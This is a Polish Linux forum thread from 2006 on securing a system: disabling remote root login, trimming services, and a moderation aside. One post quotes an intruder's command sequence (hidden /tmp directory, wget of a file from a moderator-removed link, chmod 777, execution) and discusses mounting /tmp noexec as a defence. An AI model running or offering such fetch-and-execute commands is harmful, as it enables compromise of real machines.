jaro33 Napisano Marzec 22, 2006 Zgłoszenie Share Napisano Marzec 22, 2006 (edytowane) : możliwość zdalnego logowania jako root (tekstowo i przez GDM) - to jest domyślne ("Ustawienia ekranu logowania", zakładka "Bezpieczeństwo"). też tych udogodnień nie lubię: możliwość zdalnego logowania nawet temat przyklejony przydał by się jak co odhaczyć , i jakie usługi wywalić bo ja na ślepo na początku szukałem Narka Edytowane Marzec 22, 2006 przez jaro33 Odnośnik do komentarza Udostępnij na innych stronach More sharing options...
@WalDo Napisano Marzec 22, 2006 Zgłoszenie Share Napisano Marzec 22, 2006 Ech, PM dalej nie działa, więc musze tutaj. _Pat może warto w takim razie również zmoderować fragment mojego pierwszego (drugiego w ogóle w tym wątku) wpisu - średnio inteligentny wielbiciel pingwinów łatwo pożeni zmoderowane wpisy z postu narrowa z moimi wypocinami nt. abuse. Pozdr, W. Odnośnik do komentarza Udostępnij na innych stronach More sharing options...
Adi1981 Napisano Sierpień 16, 2006 Zgłoszenie Share Napisano Sierpień 16, 2006 ... cd /tmp cd .tmp mkdir .tmp cd .tmp wget link_usunięty_przez_modratora/loco1/aVe.txt;chmod 777 * ./aVe.txt ./aVe.txt ... co radzicie? Zeby uniknąć tego taku wystarczyłoby teoretycznie bardzo proste rozwiązanie, a mianowicie osobna partycja /tmp i montowanie jej z opcją noexec (Tak powinna być zawsze zabezpieczona ta partycja). Niestety jak już wspomniałem to tylko teoria, gdyż w praktyce po zamontowaniu partycji /tmp z opcją noexec nie uruchomi nam się znaczna część programów... (co jest wg. mnie ewidentnym błędem tych programów) :| Odnośnik do komentarza Udostępnij na innych stronach More sharing options...
lone_wolf Napisano Sierpień 17, 2006 Zgłoszenie Share Napisano Sierpień 17, 2006 Kiedyś czytałem jak hacker wszedł na serwery Gentoo i buszowł tam kilka godzin. Miał pecha bo nie zdążył po sobie śladów pozacierać. Odnośnik do komentarza Udostępnij na innych stronach More sharing options...
Albert Napisano Sierpień 17, 2006 Zgłoszenie Share Napisano Sierpień 17, 2006 Biorąc pod uwagę datę tematu należałoby już raczej pisać w czasie przeszłym Odnośnik do komentarza Udostępnij na innych stronach More sharing options...
Rekomendowane odpowiedzi